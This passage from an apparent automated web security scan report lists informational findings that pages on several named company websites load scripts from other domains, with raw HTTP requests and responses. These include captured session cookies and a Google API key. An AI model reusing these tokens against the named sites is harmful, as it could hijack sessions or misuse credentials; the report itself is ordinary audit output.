Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=kn1HQ8lGzAEkAAAANTUxOTkwMDUtMTlhZC00NjBiLTlhZWUtOTc5OTU2NzkzNDgx0; sifrFetch=true; __utmz=18594464.1305158372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18594464.1340748012.1305158372.1305158372.1305158372.1; __utmc=18594464; __utmb=18594464.1.10.1305158372; language=en-US

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.19. http://www.hickorytech-is.com/products/suitesolution-/usage-pricing-manager.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech-is.com
Path:	/products/suitesolution-/usage-pricing-manager.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /products/suitesolution-/usage-pricing-manager.aspx HTTP/1.1
Host: www.hickorytech-is.com
Proxy-Connection: keep-alive
Referer: http://www.hickorytech-is.com/products/suitesolution-.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=kn1HQ8lGzAEkAAAANTUxOTkwMDUtMTlhZC00NjBiLTlhZWUtOTc5OTU2NzkzNDgx0; sifrFetch=true; __utmz=18594464.1305158372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18594464.1340748012.1305158372.1305158372.1305158372.1; __utmc=18594464; language=en-US

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:51:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.20. http://www.hickorytech.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js

Request

GET / HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Referer: http://www.hickorytech.com/residential-services/digital-tv.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.13.10.1305158342; language=en-US

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

19.21. http://www.hickorytech.com/business-services/data.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/business-services/data.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /business-services/data.aspx HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.11.10.1305158342; language=en-US

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.22. http://www.hickorytech.com/site-map.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/site-map.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /site-map.aspx HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; language=en-US; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.8.10.1305158342

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.23. http://www.hickorytech.com/wholesale-services/access-services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/wholesale-services/access-services.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /wholesale-services/access-services.aspx HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; language=en-US; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.10.10.1305158342

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.24. http://www.hickorytech.com/wholesale-services/fiber-based-transport.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/wholesale-services/fiber-based-transport.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /wholesale-services/fiber-based-transport.aspx HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; language=en-US; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.11.10.1305158342

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:02:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.25. http://www.hickorytech.com/wholesale-services/network-operations-center.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hickorytech.com
Path:	/wholesale-services/network-operations-center.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /wholesale-services/network-operations-center.aspx HTTP/1.1
Host: www.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=SDAlNMlGzAEkAAAAMGNkYTgyYjAtY2RhMS00Y2JkLWJjZWYtM2EyY2NhZTQwMGZh0; __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; language=en-US; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.9.10.1305158342

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

19.26. http://www.job-search-engine.com/keyword/number-portability/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.job-search-engine.com
Path:	/keyword/number-portability/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/adsense/search/ads.js

Request

Response

19.27. http://www.onwav.com/lnp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onwav.com
Path:	/lnp

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: dancer.session=893606761925970901924588756288095317; path=/; HttpOnly
X-Powered-By: Perl Dancer 1.3011
Date: Thu, 12 May 2011 00:48:31 GMT
Connection: keep-alive
Content-Length: 3893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>OnWav</title>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/javascripts/themes/blue/style.css">
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">
</script>
...[SNIP]...

19.28. http://www.redskye911.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET / HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4mdi3f340bskqq55hrzhsr45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet"
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...

19.29. http://www.redskye911.com/e911_information_center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_information_center/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.2.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26066

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Center - RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-pr
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.30. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/e911_hosted_solutions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_information_center/e911_hosted_solutions/ HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/
Cookie: tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.3.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-2

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:08:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18136

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
E911 Hosted Solutions :: E911 Center :: RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet" type="text/css" media="pri
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.31. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_information_center/e911_hosted_solutions/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/e911_hosted_solutions/
Cookie: tz=5; tz=5; ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.4.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-3

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16438

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.32. http://www.redskye911.com/e911_information_center/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /e911_information_center/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
